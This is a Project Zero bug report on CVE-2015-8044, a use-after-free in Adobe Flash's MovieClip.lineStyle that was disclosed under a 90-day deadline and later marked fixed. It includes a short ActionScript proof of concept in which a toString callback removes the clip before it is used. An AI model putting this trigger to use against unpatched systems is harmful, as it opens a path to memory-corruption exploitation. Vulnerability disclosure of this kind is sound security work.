558 - Adobe Flash: Use-after-frees in MovieClip.lineStyle - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Dec 2015
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CVE-2015-8044 CCProjectZeroMembers Product-Flash Reported-2015-Oct-7 Severity-High Label-4161 Vendor-Adobe

Adobe Flash: Use-after-frees in MovieClip.lineStyle

Project Member Reported by natashenka@google.com, Oct 7 2015

Back to list

There are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. A PoC is as follows:

this.createEmptyMovieClip("triangle_mc", this.getNextHighestDepth());
var o = {toString: func};
triangle_mc.lineStyle(5, 0xff00ff, 100, true, o, "round", "miter", 1);

function func(){
	
	triangle_mc.removeMovieClip();
	return "none";
	
	}

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

linestyle.swf
771 bytes Download

linestyle.fla
4.7 KB Download

Project Member Comment 1 by natashenka@google.com, Oct 8 2015

Labels: Label-4161

Project Member Comment 2 by natashenka@google.com, Nov 6 2015

Labels: CVE-2015-8044

Project Member Comment 3 by natashenka@google.com, Dec 17 2015

Labels: -Restrict-View-Commit

Project Member Comment 4 by natashenka@google.com, Dec 17 2015

Status: Fixed

► Sign in to add a comment